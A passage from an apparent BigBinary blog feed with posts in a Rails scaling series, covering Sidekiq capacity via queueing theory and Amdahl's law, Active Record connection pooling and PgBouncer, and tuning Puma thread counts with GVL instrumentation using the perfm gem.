I/O percentage)</p><p><code>n</code> is the number of threads (concurrency)</p><p>Speedup is equivalent to theoretical parallelism in this context. In queueingtheory, parallelism refers to how many units of work can be processedsimultaneously. When we calculate speedup using Amdahl's Law, we're essentiallydetermining how much faster a multi-threaded system can handle work compared toa single-threaded system.</p><p>Let's assume that a system has an I/O of 50% and a concurrency of 10. ThenSpeedup will be:</p><pre><code class="language-ruby">Speedup = 1 / ((1 - 0.5) + 0.5 / 10) = 1 / 0.55 = 1.82  2</code></pre><p>This means one Sidekiq process with 10 threads will handle jobs twice as fast asSidekiq with a single process with a single thread.</p><p>Let's recap what we are saying here. We are assuming that the system has I/O of50%. System is using a single Sidekiq process with 10 threads(concurrency). Thenbecause of 10 threads the system has a speed gain of 2x compared to systemhaving just a single thread. In other words, just because we have 10 threadsrunning we are not going to gain 10X performance improvement. What those 10threads is getting us is what is called &quot;theoretical parallelism&quot;.</p><p>Similarly, for other values of I/O and Concurrency, we can get the theoreticalparallelism.</p><table><thead><tr><th>I/O</th><th>Concurrency</th><th>Theoretical parallelism</th></tr></thead><tbody><tr><td>5%</td><td>1</td><td>1</td></tr><tr><td>25%</td><td>5</td><td>1.25</td></tr><tr><td>50%</td><td>10</td><td>2</td></tr><tr><td>75%</td><td>16</td><td>3</td></tr><tr><td>90%</td><td>32</td><td>8</td></tr><tr><td>95%</td><td>64</td><td>16</td></tr></tbody></table><p>Let's go over one more time. In the last example, what we are stating is that ifa system has 95% I/O and if the system has 64 threads running, then that willgive 16x performance improvement over the same system running on a singlethread.</p><p>Here is the graph for this data.</p><p><img src="/blog_images/2025/understanding-queueing-theory/concurrency-vs-effective-parallelism.png" alt="Theoretical Parallelism"></p><p>As shown in the graph, a Sidekiq process with 16 threads handling jobs that are75% I/O-bound achieves a theoretical parallelism of approximately 3. In otherwords, 3x performance improvement is there over a single-threaded system.</p><h2>Calculating the number of processes required</h2><p>At the beginning of this article, we discussed &quot;Little's law&quot; and we discussedthat <code>L</code> is also called &quot;offered traffic,&quot; which depicts the &quot;average number ofjobs in the system&quot;.</p><p>If &quot;offered traffic&quot; is 5, then it means we have 5 units of work arriving onaverage that requires processing simultaneously.</p><p>We just learned that if the utilization is greater than 75% then it can causeproblems as there is a risk of latency to spike.</p><p>For queues with low latency requirements(eg. <code>urgent</code>), we need to target alower utilization rate. Let's say we want utilization to be around 50% to be onthe safe side.</p><p>Now we know the utilization rate that we need to target and we know the &quot;offeredtraffic&quot;. So now we can calculate the &quot;parallelism&quot;.</p><pre><code class="language-ruby">utilization = offered_traffic / parallelism=&gt; 0.50 = 5 / parallelism=&gt; parallelism = 5 / 0.50 = 10</code></pre><p>This means we need a theoretical parallelism of 10 to ensure that theutilization is 50% at max.</p><p>Let's assume the jobs in this queue have an average of <code>50%</code> I/O. Based on theabove mentioned graph, we can see that if the concurrency is 10 then we getparallelism of 2. However, increasing the concurrency doesn't increase theparallelism. It means if we want 10 parallelism, then we can't just switch toconcurrency of 50. Even the concurrency of 50 (or 50 threads) will only yield aparallelism of 2.</p><p>So we have no choice but to add more processes. Since one process with 10concurrency is yielding a parallelism of 2 we need to add 5 processes to get 10parallelism.</p><p><em>To get the I/O wait percentage, we can make use of perfm.<a href="https://github.com/bigbinary/perfm?tab=readme-ov-file#sidekiq-gvl-instrumentation">Here</a>is the documentation on how it can be done.</em></p><pre><code class="language-ruby">Total number of Sidekiq processes required = 10 / 2 = 5</code></pre><p>Here we're talking about Sidekiq free version, where we'll only be able to run asingle process per dyno. If we're using Sidekiq Pro, we can run multipleprocesses per dyno via Sidekiq Swarm.</p><p>We can provision 5 dynos for the urgent queue. But we should always have a queuetime based autoscaler like Judoscale enabled to handle spikes.</p><h2>Sources of Saturation</h2><p>We discussed earlier that, in the context of queueing theory, the saturationpoint is typically reached at around 70-75% utilization. This is from the pointof view of further gains by adding more threads.</p><p>However saturation can occur in other parts of the system.</p><h3>CPU</h3><p>The servers running your Sidekiq processes have finite CPU and memory. While CPUusage is a metric we can track for Sidekiq, it's generally not the only one weneed to focus on for scaling decisions.</p><p>CPU utilization can be misleading. If our jobs spend most of their time doingI/O (like making API calls or database queries), in which case CPU usage will bevery low, even when our Sidekiq system is at capacity.</p><h3>Memory</h3><p>Memory utilization impacts performance very differently from CPU utilization.Memory utilization generally exhibits minimal changes in latency or throughputfrom 0% to 100% utilization. However, after 100% utilization, things will startto deteriorate significantly. The system will start using the swap memory, whichcan be very slow and thereby increase the job service times.</p><h3>Redis</h3><p>Another place where saturation can occur is in our datastore i.e Redis in caseof Sidekiq. We have to make sure that we provision a separate Redis instance forSidekiq and also make sure to set the eviction policy to <code>noeviction</code>. Thisensures that Redis will reject new data when the memory limit is reached,resulting in an explicit failure rather than silently dropping important jobs.</p><p><em>This was Part 6 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of theblog is not clear to you then please write to us at<a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>,<a href="https://twitter.com/bigbinary">Twitter</a> or<a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding Active Record Connection Pooling]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-active-record-connection-pooling"/>
      <updated>2025-05-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-active-record-connection-pooling</id>
      <content type="html"><![CDATA[<p><em>This is Part 5 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><h2>Database Connection Pooling</h2><p>When a Rails application needs to interact with a database, it establishes aconnection, which is a dedicated communication channel between the applicationand the database server. When a new request comes to Rails, the operation can behandled like this.</p><ol><li>Create a connection</li><li>Do database operation</li><li>Close the connection</li></ol><p>When the next request comes, then repeat the above process.</p><p>Creating new database connections is an expensive operation - it takes time toestablish the connection, authenticate, and set up the communication channel. Itmeans that every single time a request comes, we are spending time in setting upthe connection.</p><p>Wouldn't it be better to store the established connection to somewhere and whena new request comes, then get the pre-established connection from this pool.This expedites the process since we don't need to create a connection and closea connection in every single request.</p><p>The new process might look like this.</p><ol><li>Create a connection</li><li>Do database operation</li><li>Put the connection in a pool</li></ol><p>Now, when a new request comes, the operation will look like this.</p><ol><li>Get the connection from the pool</li><li>Do database operation</li><li>Return the connection to the pool</li></ol><p>Database connection pooling is a performance optimization technique thatmaintains a set of reusable database connections.</p><h2>Active Record Connection Pool Implementation</h2><p>Active Record manages a pool of database connections for each web and backgroundprocess. Each process will have a connection pool of its own, which means aRails application running with multiple processes (like Puma processes, Sidekiqprocesses) will have multiple independent connection pools. The pool is a set ofdatabase connections that are shared among threads in the <strong>same process</strong>.</p><p>Note that the pooling happens at the process level. A thread from process Acan't get a connection from process B.</p><p><img src="/blog_images/2025/understanding-active-record-connection-pooling/without-pg-bouncer.png" alt="Connection pooling"></p><p>When a connection is needed, the thread checks out a connection from the pool,perform operations, and then returns the connection to the pool. This is done ata query level now. For each individual query, a connection is leased, used, andthen returned back to the pool.</p><p>Pre Rails 7.2, the connection used to be leased and held till the end of therequest if it is a web request and till the job is done if it is a backgroundjob. This was a problem for applications that spent a lot of time doing I/O. Thethread will hog the connection for the entire duration of the I/O operationlimiting the number of queries that can be executed concurrently. To facilitatethis change and make query caching work, the query cache has been<a href="https://github.com/rails/rails/pull/50938/">updated</a> to be owned by the pool.</p><p>This means that the query cache is now shared across all connections in thepool. Previously, each connection had its own query cache. As the whole requestused the same connection, this was fine. But now, as the connection is leasedfor each query, the query cache needs to be shared across all connections in thepool.</p><p><img src="/blog_images/2025/understanding-active-record-connection-pooling/connection-leasing-comparison.png" alt="Connection-leasing-comparison"></p><h2>Connection Pool Configuration Options</h2><p>Active Record's connection pool behavior can be customized through severalconfiguration options in the database.yml file:</p><ul><li><a href="https://api.rubyonrails.org/classes/ActiveRecord/DatabaseConfigurations/HashConfig.html#method-i-pool">pool</a>:Sets the maximum number of connections the pool will maintain. The default istied to <code>RAILS_MAX_THREADS</code>, but you can set it to any value. There is a smallproblem when you set it to <code>RAILS_MAX_THREADS</code> which we'll discuss later.</li><li><a href="https://api.rubyonrails.org/classes/ActiveRecord/DatabaseConfigurations/HashConfig.html#method-i-checkout_timeout">checkout timeout</a>:Determines how long a thread will wait to get a connection before timing out.The default is 5 seconds. If all connections are in use and a thread waitslonger than this value, an <code>ActiveRecord::ConnectionTimeoutError</code> exceptionwill be raised.</li><li><a href="https://api.rubyonrails.org/classes/ActiveRecord/DatabaseConfigurations/HashConfig.html#method-i-idle_timeout">idle timeout</a>:Specifies how long a connection can remain idle before it's removed from thepool. The default is 300 seconds. This helps reclaim resources fromconnections that aren't being used.</li><li><a href="https://api.rubyonrails.org/classes/ActiveRecord/DatabaseConfigurations/HashConfig.html#method-i-reaping_frequency">reaping frequency</a>:Controls how often the Reaper(which we'll discuss shortly) process runs toremove dead or idle connections. The default is 60 seconds.</li></ul><h2>Active Record Connection Pool Reaper</h2><p>Database connections can sometimes become &quot;dead&quot; due to issues like databaserestarts, network problems etc. Active Record provides Reaper to handle this.</p><p>The Reaper periodically checks connections in the pool and removes deadconnections as well as idle connections that have been checked out for a longtime.</p><p>It acts somewhat like a garbage collector for database connections. The Reaperuses the <code>idle_timeout</code> setting to determine how long a connection can remainidle before being removed, tracking idle time based on when connections werelast used.</p><p>There is another configuration option called <code>reaping_frequency</code> that controlshow often the Reaper runs to remove dead or idle connections from the pool. Bydefault, this is set to 60 seconds. It means the Reaper will wake up once everyminute to perform its maintenance tasks.</p><p>If your application is spiky and receives a lot of traffic in surges, then setthe reaping frequency and idle timeout to a lower value. This will ensure thatthe reaper runs more frequently and removes idle connections more quickly,helping to keep the connection pool healthy and responsive.</p><h2>Why are idle connections bad?</h2><p>Idle database connections can significantly impact database performance forseveral interconnected reasons:</p><p><strong>Memory Consumption</strong>: Each database connection, even when idle, maintains itsown memory allocation. The database must reserve memory for session state,buffers, user context, and transaction workspace. This memory remains allocatedeven when the connection isn't doing any work. For example, if each connectionuses 10 MB of memory, 100 idle connections would unnecessarily consume 1 GB ofyour database's memory that could otherwise be used for active queries, caching,or other productive work.</p><p><strong>CPU overhead</strong>: While &quot;idle&quot; suggests no activity, the database still performsregular maintenance work for each connection. It must monitor connection healthvia keepalive checks, manage process tables etc.</p><p>The crucial issue is that the overhead of having idle connections scalesnon-linearly. As we add more idle connections, the database spends an increasingproportion of its CPU time just managing these connections rather thanprocessing actual queries. Thankfully, the reaper handles this for us.</p><h2>How many database connections will the web and background processes utilize at maximum?</h2><p>As we learned, the connection pool is managed at the process level. Each Railsprocess maintains its own pool.</p><ol><li><strong>In web processes (Puma)</strong>:</li></ol><p>Each Puma process is a separate process with its own connection pool. In aprocess, each thread can check out one connection. Therefore, maximumconnections needed per process equals <code>max_threads</code> setting in Puma.</p><ol start="2"><li><strong>In background processes (Sidekiq)</strong>:</li></ol><p>Sidekiq runs as a separate process with its own connection pool. The Sidekiq<code>concurrency</code> setting determines the number of threads and therefore the maximumconnections needed equals the <code>concurrency</code> value.</p><p><em>Note: If you're using Sidekiq swarm and running multiple Sidekiq processes,then take that it into account.</em></p><p>We can calculate the total potential connections for a typical application asshown below.</p><pre><code>Web connections = Number of web dynos * Number of Puma processes                  * `max_threads` valueBackground connections = Number of worker dynos * Number of Sidekiq processes                         * Threads per processTotal number of connections = Web connections + Background connections</code></pre><p>The key thing to note here is that the database needs to support at least thesemany simultaneous connections.</p><p><em>Note that if preboot is enabled, then the maximum number of connections will be<strong>double</strong> the above value. This is because during the release phase, there is asmall window in which both the old dynos and new dynos are running.</em></p><p>In Rails 7,<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/Relation.html#method-i-load_async"><code>load_async</code></a>was introduced which allows us to run database queries asynchronously in abackground thread. When <code>load_async</code> is in used, the calculation for maximumnumber of connections needed changes a bit. First, let's understand how<code>load_async</code> works.</p><h2>How <code>load_async</code> works</h2><p><code>load_async</code> allows Rails to execute database queries asynchronously inbackground threads. Unlike regular ActiveRecord queries which are lazily loaded,<code>load_async</code> queries are always executed immediately in background threads andjoined to the main thread when results are needed.</p><p>The async executor is configured through the<code>config.active_record.async_query_executor</code> setting. There are three possibleconfigurations:</p><ol><li><code>nil</code> (default): Async queries are disabled, and <code>load_async</code> will executequeries synchronously.</li><li><code>:global_thread_pool</code>: Uses a single thread pool for all databaseconnections.</li><li><code>:multi_thread_pool</code>: Uses separate thread pools for each databaseconnection.</li></ol><p>Rails provides a configuration option named<a href="https://guides.rubyonrails.org/configuring.html#config-active-record-global-executor-concurrency">global_executor_concurrency</a>(default: 4) that controls how many concurrent async queries can run perprocess. So, the maximum number of connections per process when <code>load_async</code> isused.</p><pre><code class="language-ruby">Maximum connections per process = Process level concurrency                                  + global_executor_concurrency + 1</code></pre><p>Here Process level concurrency means <code>max_threads</code> for the Puma process and<code>sidekiq_conurrency</code> for the Sidekiq process.</p><p>The &quot;+1&quot; accounts for the main control thread, which may occasionally need aconnection (e.g., during model introspection at class load time).</p><p>There is a nice<a href="https://judoscale.com/tools/heroku-postgresql-connection-calculator">calculator</a>created by the folks at <a href="https://judoscale.com/">Judoscale</a> which can be used tocalculate the maximum number of connections needed for your application.</p><h2>Setting Database Pool Size Configuration</h2><p>Our <code>database.yml</code> file has the following line.</p><pre><code class="language-yaml">pool: &lt;%%= ENV.fetch(&quot;RAILS_MAX_THREADS&quot;) { 5 } %&gt;</code></pre><p>We know that a thread doesn't take more than one DB connection. So the maximumnumber of connections needed per pool is equal to the total number of threads.So the above configuration looks fine.</p><p>However this doesn't take into account whether we use <code>load_async</code> or not. If weuse <code>load_async</code>, then the number of connections needed per process will be<code>RAILS_MAX_THREADS + global_executor_concurrency + 1</code>.</p><p>Do we really need to go into this much detail to determine the pool size? Turnsout there is a much easier answer.</p><p>Almost all database hosting providers mention the maximum number of connectionsallowed in their plan. We can just set the pool config to the maximum number ofconnections supported by our database plan. Let us say we have a Standard-0database on Heroku. It supports up to 120 connections. So we can set the poolconfig to 120.</p><pre><code class="language-yaml">pool: 120</code></pre><p>We can do this because the database connections are lazily initialized in thepool. The application doesn't create more database connections than it needs. Sowe needn't be conservative here.</p><p>The only thing we need to ensure is that the maximum connection utilizationdoesn't exceed the database plan limit. If that happens, then we have anothersolution - PgBouncer.</p><h2>PgBouncer</h2><p>PgBouncer is a lightweight connection pooler for PostgreSQL. It sits between ourapplication(s) and our PostgreSQL database and manages a pool of databaseconnections.</p><p>While both PgBouncer and Active Record provide connection pooling, they operateat different levels and serve different purposes.</p><p>Active Record connection pool operates within a single Ruby process and managesconnections for threads within the process, whereas PgBouncer is an externalconnection pooler that sits between the application and the database and managesconnections across all the application processes.<img src="/blog_images/2025/understanding-active-record-connection-pooling/with-pg-bouncer.png" alt="With PgBouncer"></p><h2>The dreaded ActiveRecord::ConnectionTimeoutError</h2><p>This error comes up when a thread waits more than <code>checkout_timeout</code> seconds toacquire a connection. This usually happens when the <code>pool</code> size is set to avalue less than the concurrency.</p><p>For example, lets say we have set the Sidekiq concurrency to 10 and pool sizeto 5. If we have more than 5 threads wanting a connection at any point of time,the threads will have to wait.</p><p><img src="/blog_images/2025/understanding-active-record-connection-pooling/threads-waiting-for-connection.png" alt="Connection pooling"></p><p>What's the solution? As we discussed earlier setting the <code>pool</code> to a really highvalue should fix the error in most cases.</p><p>Even after setting the config correctly, <code>ActiveRecord::ConnectionTimeoutError</code>can still happen and it could be puzzling. Let is discuss a few scenarios wherethis can happen.</p><h2>Custom code spinning up new threads and taking up connections</h2><pre><code class="language-ruby">class SomeService  def process    threads = []    5.times do |index|      threads &lt;&lt; Thread.new do        ActiveRecord::Base.connection.execute(&quot;select pg_sleep(5);&quot;)      end    end    threads.each(&amp;:join)  endend</code></pre><p>Here 5 threads are spun up. Note that these threads also take up connectionsfrom the same pool allotted to the process.</p><h3>Active Storage proxy mode</h3><p>Even if our application code is not spinning up new threads, Rails itself cansometimes spin up additional threads. For example Active Storage configured in<a href="https://edgeguides.rubyonrails.org/active_storage_overview.html#proxy-mode">proxy mode</a>.</p><p>Active Storages proxy controllers<a href="https://github.com/rails/rails/blob/b97a7625970c74f2273211ccb17046049f409110/activestorage/app/controllers/active_storage/blobs/proxy_controller.rb">1</a>,<a href="https://github.com/rails/rails/blob/b97a7625970c74f2273211ccb17046049f409110/activestorage/app/controllers/active_storage/representations/proxy_controller.rb">2</a>generate responses as streams, which require dedicated threads for processing.</p><p>This means that when serving an Active Storage file through one of these proxycontrollers, Rails actually utilizes two separate threads - one for the mainrequest and another for the streaming process. Each of these threads requiresits own separate database connection from the ActiveRecord connection pool.</p><h3>Rack timeouts</h3><p><a href="https://github.com/zombocom/rack-timeout">rack-timeout</a> is commonly used acrossRails applications to automatically terminate long-running requests. While ithelps prevent server resources from being tied up by slow requests, it can alsocause a few issues.</p><p>Rack timeout uses Ruby's<a href="https://rubyapi.org/3.4/o/thread#method-i-raise">Thread#raise</a> API to terminaterequests that exceed the configured timeout. When a timeout occurs, rack-timeoutraises a <code>Rack::Timeout::RequestTimeoutException</code> from another thread. If thisexception is raised while a thread is in the middle of database operations, itcan prevent proper cleanup of database connections.</p><h2>Tracking down ActiveRecord::ConnectionTimeoutErrors</h2><p>If we still frequently see <code>ActiveRecord::ConnectionTimeoutError</code> exceptions inour application, we can get additional context by logging the connection poolinfo to our error monitoring service. This can help identify which all threadswere holding onto the connections when the error occurred.</p><pre><code class="language-ruby">config.before_notify do |notice|  if notice.error_class == &quot;ActiveRecord::ConnectionTimeoutError&quot;    notice.context = { connection_pool_info: detailed_connection_pool_info }  endenddef detailed_connection_pool_info  connection_info = {}  ActiveRecord::Base.connection_pool.connections.each_with_index do |conn, index|    connection_info[&quot;connection_#{index + 1}&quot;] = conn.owner ? conn.owner.inspect : &quot;[UNUSED]&quot;  end  connection_info[&quot;current_thread&quot;] = Thread.current.inspect  connection_infoend</code></pre><p><code>&lt;thread_obj&gt;.inspect</code> gives us the name, id and status of the thread. Forexample, if one entry in the hash looks like<code>#&lt;Thread:0x00006a42eca73ba0@puma srv tp 002 /app/.../gems/puma-6.2.2/lib/puma/thread_pool.rb:106 sleep_forever&gt;</code>then it means that the connection is taken up by a Puma thread.</p><h2>Monitoring Active Record Connection Pool Stats</h2><p>If we want to monitor Active Record Connection Pool stats, then periodically weneed to send the stats to a service provider which can display the datagraphically. For periodically checking the stat, we are using<a href="https://github.com/jmettraux/rufus-scheduler">rufus-scheduler</a> gem. Forcollecting the data and showing the data we are using NewRelic but you can useany APM of your choice. We have configured to send the pool stat every 15seconds.</p><p><a href="https://gist.github.com/vishnu-m/8cfae21cac385aa07819c8805e491872">Here</a> is thegist which collects and sends data.</p><p><em>This was Part 5 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of theblog is not clear to you then please write to us at<a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>,<a href="https://twitter.com/bigbinary">Twitter</a> or<a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Finding ideal number of threads per process using GVL instrumentation]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/tuning-puma-max-threads-configuration-with-gvl-instrumentation"/>
      <updated>2025-05-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/tuning-puma-max-threads-configuration-with-gvl-instrumentation</id>
      <content type="html"><![CDATA[<p><em>This is Part 4 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><p>In<a href="https://bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance">part 1</a>we saw how to find ideal number of processes for our Rails application.</p><p>In<a href="https://bigbinary.com/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency">part 3</a>,we learned about Amdahl's law, which helps us find the ideal number of threadstheoretically.</p><p>In this blog, we'll run a bunch of tests on our real production application tosee what the actual number of threads should be for each process.</p><p>In<a href="https://bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance">part 1</a>we discussed the presence of GVL and the concept of thread switching. Based onthe GVL's interaction, a thread can be in one of these three states.</p><ol><li><strong>Running</strong>: The thread has the GVL and is executing Ruby code.</li><li><strong>Idle</strong>: The thread doesn't want the GVL because it is performing I/Ooperations.</li><li><strong>Stalled</strong>: The thread wants the GVL and is waiting for it in the GVL waitqueue.</li></ol><p><img src="/blog_images/2025/tuning-puma-max-threads-configuration-with-gvl-instrumentation/thread-states.png" alt="Thread states"></p><p>Based on the above diagram, we can approximately equate <code>idle time</code> to<code>I/O time</code>.</p><h2>GVL instrumentation using perfm</h2><p>Thanks to Jean Boussier's work on the<a href="https://bugs.ruby-lang.org/issues/18339">GVL instrumentation API</a> and JohnHawthorn's work on <a href="https://github.com/jhawthorn/gvl_timing">gvl_timing</a>, we cannow measure the time a thread spends in each of these states for apps running onRuby 3.2 or higher.</p><p>Using the great work done by these folks, we have created<a href="https://github.com/bigbinary/perfm">perfm</a>, to help us figure out the idealnumber of Puma threads based on the application's workload.</p><p>Perfm inserts a Rack middleware to our Rails application. This middlewareinstruments the GVL, collects the required metrics and stores them in a table.It also has a <code>Perfm::GvlMetricsAnalyzer</code> class which can be used to generate areport on the data collected.</p><h3>Using perfm to measure the application's I/O percentage</h3><p>To use perfm, we need to add the following line to our Gemfile.</p><pre><code class="language-ruby">gem 'perfm'</code></pre><p>We'll run <code>bin/rails generate perfm:install</code>. This will generate the migrationto create <code>perfm_gvl_metrics</code> which will be used to store request-level metrics.</p><p>Now we'll create an initializer <code>config/initializers/perfm.rb</code>.</p><pre><code class="language-ruby">Perfm.configure do |config|  config.enabled = true  config.monitor_gvl = true  config.storage = :localendPerfm.setup!</code></pre><p>After deploying the code to production, we need to collect around 20K requestsas that will give us a fair number of data points to analyze. The GVL monitoringcan be disabled after that by setting <code>config.monitor_gvl</code> to <code>false</code> so thatthe table doesn't keep growing.</p><p>After collecting the request data, now it's time to analyze it.</p><p>Run the following code in the Rails console.</p><pre><code class="language-ruby">irb(main):001* gvl_metrics_analyzer = Perfm::GvlMetricsAnalyzer.new(irb(main):002*   start_time: 2.days.ago, # configure thisirb(main):003*   end_time: Time.currentirb(main):004&gt; )irb(main):005&gt;irb(main):006&gt; results = gvl_metrics_analyzer.analyzeirb(main):007&gt; io_percentage = results[:summary][:total_io_percentage]=&gt; 45.09</code></pre><p>This will give us the percentage of time spent doing I/O. We ran it in our<a href="https://neeto.com/cal">NeetoCal</a> production application and we got a value of45%.</p><p>As we discussed in<a href="/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency">part 3</a>,Amdahl's law gives us a theoretical maximum speedup based on the parallelizableportion of our workload. The formula is given below.<img src="/blog_images/2025/tuning-puma-max-threads-configuration-with-gvl-instrumentation/amdahls-law.png" alt="Amdahl's law formula"></p><p>Where:</p><ul><li><code>p</code> is the portion that can be parallelized (in our case, it's 0.45)</li><li><code>N</code> is the number of threads</li><li><code>(1 - p)</code> is the portion that must run sequentially (in our case, it's 0.55)</li></ul><p>Let's calculate the theoretical speedup for different numbers of threads with p= 0.45:</p><table><thead><tr><th>Thread Count (N)</th><th>Speedup</th><th>% Improvement from previous run</th></tr></thead><tbody><tr><td>1</td><td>1.00</td><td>-</td></tr><tr><td>2</td><td>1.29</td><td>29%</td></tr><tr><td>3</td><td>1.43</td><td>11%</td></tr><tr><td>4</td><td>1.52</td><td>6%</td></tr><tr><td>5</td><td>1.57</td><td>3%</td></tr><tr><td>6</td><td>1.60</td><td>2%</td></tr><tr><td>8</td><td>1.64</td><td>&lt;2%</td></tr><tr><td>16</td><td>1.69</td><td>&lt;1%</td></tr><tr><td></td><td>1.82</td><td>-</td></tr></tbody></table><p>We can see that after 4 threads, the percentage improvement drops below 5%. Thismeans that 4 is a reasonable value for <code>max_threads</code>. We can set the value of<code>RAILS_MAX_THREADS</code> to 4.</p><p><img src="/blog_images/2025/tuning-puma-max-threads-configuration-with-gvl-instrumentation/speedup-vs-thread-count.png" alt="Speedup V/S Number of threads"></p><p>Looking at the table, adding a 5th thread would only give us a 3% performanceimprovement, which may not justify the additional memory usage and potential GVLcontention.</p><p>We have also created a small application to help visualize and find the idealnumber of threads when the I/O percentage is provided as input.<a href="https://v0-single-page-application-lake.vercel.app/">Here</a> is the link to theapp.</p><h2>Validate thread count using stall time</h2><p>This value of <code>4</code> we got theoretically by using Amdahl's law. Now it's time toput this law to test. Let's see in the real world if the value of <code>4</code> is thecorrect value or not.</p><p>What we need to do is start with <code>RAILS_MAX_THREADS</code> env variable (Puma<code>max_threads</code>) set to <code>4</code> and then check if this value provides minimal GVLcontention. By GVL contention, we mean the amount of time a thread spendswaiting for the GVL i.e the stall time.</p><p>If the stall time is high, that means the set thread count is high. We don'twant our request threads to spend their time doing nothing causing latencyspikes.<code>75ms</code> is an acceptable value for stall time. The lesser the better ofcourse.</p><p>The average stall time can be found in the perfm analyzer results. As wementioned earlier, we had collected data for <a href="https://neeto.com/cal">NeetoCal</a>.Now let's find the average stall time.</p><pre><code class="language-ruby">irb(main):001* gvl_metrics_analyzer = Perfm::GvlMetricsAnalyzer.new(irb(main):002*   start_time: 2.days.ago,irb(main):003*   end_time: Time.current,irb(main):004*   puma_max_threads: 4irb(main):005&gt; )irb(main):006&gt; results = gvl_metrics_analyzer.analyzeirb(main):007&gt; avg_stall_ms = results[:summary][:average_stall_ms]=&gt; 110.24</code></pre><p>The stall time seems a bit high. Let us decrease the <code>RAILS_MAX_THREADS</code> valueby 1 and collect a few data points(i.e around 20K requests). Now the value of<code>RAILS_MAX_THREADS</code> will be <code>3</code>. This process has to be repeated until we findthe value for which the average stall time is less than <code>75ms</code>.</p><pre><code class="language-ruby">irb(main):001* gvl_metrics_analyzer = Perfm::GvlMetricsAnalyzer.new(irb(main):002*   start_time: 2.days.ago,irb(main):003*   end_time: Time.current,irb(main):004*   puma_max_threads: 3irb(main):005&gt; )irb(main):006&gt; results = gvl_metrics_analyzer.analyzeirb(main):007&gt; avg_stall_ms = results[:summary][:average_stall_ms]=&gt; 79.38</code></pre><p>Now the output is closer to <code>75 ms</code>.</p><p>Hence we can finalize on the value 3 as the value for <code>RAILS_MAX_THREADS</code>. If wedecrease the value again by one i.e set it to 2, the stall time will decreasebut we're limiting the concurrency of our application. It is a trade-off.</p><p>Remember that our goal is to maximize concurrency while minimizing GVLcontention. But if our app spends a lot of time doing I/O - for instance, if wehave a proxy application that makes a lot of external API calls directly fromthe controller, then we can switch the app server to<a href="https://github.com/socketry/falcon">Falcon</a>. Falcon is tailor-made for such usecases.</p><p>Broadly speaking, one should take care of the following items to ensure that thetime spent by the request doing I/O is minimal.</p><ul><li>Remove N+1 queries</li><li>Remove long-running queries</li><li>Move inline third party API calls to background job processor</li><li>Move heavy computational stuff to background job processor</li></ul><p>For a finely optimized Rails application, the <code>max_threads</code> value will bearound 3. That's why the default value of <code>max_threads</code> for Rails applicationsis <code>3</code> now. This has been decided after a lot of discussion<a href="https://github.com/rails/rails/issues/50450">here</a>. We recommend you read thewhole discussion. It is very interesting.</p><p><em>This was Part 4 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of theblog is not clear to you then please write to us at<a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>,<a href="https://twitter.com/bigbinary">Twitter</a> or<a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Amdahl's Law - The Theoretical Relationship Between Speedup and Concurrency]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency"/>
      <updated>2025-04-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency</id>
      <content type="html"><![CDATA[<p><em>This is Part 3 of our blog series on<a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><p>We have only two parameters to work with if we want to fine-tune our Pumaconfiguration.</p><ol><li>The number of processes.</li><li>The number of threads each process can have.</li></ol><p>In<a href="https://bigbinary.com/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance">part 1</a>of <a href="https://www.bigbinary.com/blog/scaling-rails-series">Scaling Rails series</a>,we saw what the number of processes should be. Now let's look at what the numberof threads in each process should be.</p><h2>Amdahl's law</h2><p>Each application has a few things which must be performed in &quot;serial order&quot; anda few things which can be &quot;parallelized&quot;. If we draw a diagram, then this iswhat it will look like.</p><p><img src="/blog_images/2025/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency/amdahls-gantt-chart1.png" alt="Amdahl's law Gantt chart"></p><p>Let's say that <code>T1'</code> and <code>T2'</code> are the enhanced times. These are the times theapplication would take after the enhancement has been applied. In this case theenhancement will come in the form of increasing the threads in a process.</p><p><code>T1'</code> will be same as <code>T1</code> since it's the serial part. <code>T2'</code> will be lower than<code>T2</code> since we will parallelize some of the code. After the parallelization isdone, the enhanced version would look something like this.</p><p><img src="/blog_images/2025/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency/amdahls-gantt-chart.png" alt="Amdahl's law Gantt chart"></p><p>It's clear that the serial part (T1) will limit how much speedup we can get nomatter how much we parallelize <code>T2</code>.</p><p>Computer scientist <a href="https://en.wikipedia.org/wiki/Gene_Amdahl">Gene Amdahl</a> cameup with <a href="https://en.wikipedia.org/wiki/Amdahl%27s_law">Amdahl's law</a> which givesthe mathematical value for the overall speedup that can be achieved.</p><p><img src="/blog_images/2025/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency/amdahls-law.png" alt="Amdahl's law picture"></p><p>I made a video explaining how this formula came 